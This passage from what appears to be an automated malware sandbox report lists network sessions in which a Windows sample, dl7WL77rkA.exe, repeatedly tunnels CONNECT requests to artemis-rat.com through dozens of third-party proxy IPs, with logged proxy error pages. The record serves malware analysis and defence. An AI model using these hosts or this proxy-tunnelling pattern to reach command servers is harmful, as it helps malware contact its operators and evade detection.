                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2026192.168.2.555415221.231.13.19810803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.645323038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.984956026 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.22.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0</center></body></html>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
2027192.168.2.552076217.145.199.47567463876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.651853085 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
2028192.168.2.552123195.211.219.14755553876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.652055025 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.722996950 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:53.905137062 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:59.922352076 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
2029192.168.2.555422148.66.130.18756303876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.653350115 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.405126095 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.594788074 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
2030192.168.2.554065161.97.163.52285933876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.716696978 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
2031192.168.2.55516551.15.242.20288883876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.717307091 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.486942053 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.780368090 CET | 309 | IN | HTTP/1.1 400 Bad Request
Server: nginx/1.21.6
Date: Mon, 11 Mar 2024 02:30:48 GMT
Content-Type: text/html
Content-Length: 157
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.21.6</center></body></html>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
2032192.168.2.555167185.49.31.20780813876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.739084005 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
2033192.168.2.55400362.171.131.101410553876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.740356922 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
2034192.168.2.55544945.11.95.16550283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.751038074 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.487029076 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.702132940 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.014588118 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:56.385159016 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2035192.168.2.554055148.72.212.18327923876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.751970053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.889324903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.905153036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.905189991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2036192.168.2.55402651.83.190.248190503876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.759493113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.852087975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.905316114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.922368050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2037192.168.2.55398847.74.152.2988883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.773905993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.852170944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.905332088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.922369957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2038192.168.2.55544793.126.56.3041533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.856772900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2039192.168.2.552153162.241.45.22449313876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.857086897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.889448881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.905191898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.905246973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2040192.168.2.55398120.193.135.50803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.882648945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:19.004070044 CET805INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:18 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 613
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:21.427016020 CET805INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:18 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 613
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:24.370995998 CET805INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:18 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 613
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:30.259371996 CET805INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:18 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 613
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:41.779217958 CET805INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:18 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 613
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2041192.168.2.55400972.169.67.109873876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.887171984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.889483929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.966269016 CET766INHTTP/1.0 514 Web Acceleration Client Error (514) - Proxied HTTPS Request Not Supported
                                                                                                                                                                                                                                                            Content-type: text/html
                                                                                                                                                                                                                                                            Content-length: 630
                                                                                                                                                                                                                                                            Data Ascii: <TITLE>Web Acceleration Client Error (514) - Proxied HTTPS Request Not Supported</TITLE><B><font face=arial color=#3642a2>Web Acceleration Client Error (514) - Proxied HTTPS Request Not Supported</font></B><font style=normal face=arial size=2px><P>The Web Acceleration Client does not support secure requests (HTTPS) from a browser when: <P> <UL><LI> The browser is proxied to Web Acceleration Client for secure requests (HTTPS), and <LI> The Web Acceleration Client is not configured with a proxy server, and <LI> SSLB is disabled </UL><P> To correct this problem, you must remove the proxy settings from your browser.</P></font>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2042192.168.2.555457162.214.225.223434353876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.895225048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.486943960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.217840910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.608340979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2043192.168.2.55477972.37.217.341453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.895684004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2044192.168.2.555454211.222.252.18781973876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.895795107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
